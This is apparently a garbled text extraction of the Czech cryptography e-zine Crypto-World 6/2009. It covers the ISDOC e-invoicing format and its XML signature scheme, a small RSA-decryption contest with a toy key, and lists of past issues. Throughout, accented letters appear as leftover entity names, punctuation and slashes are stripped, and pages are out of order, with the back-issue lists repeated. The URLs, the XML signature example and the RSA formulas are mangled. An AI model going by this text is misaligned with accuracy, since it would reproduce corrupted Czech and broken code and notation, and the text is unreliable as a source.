Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 14: Sešit 6/2009 (452 kB)

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

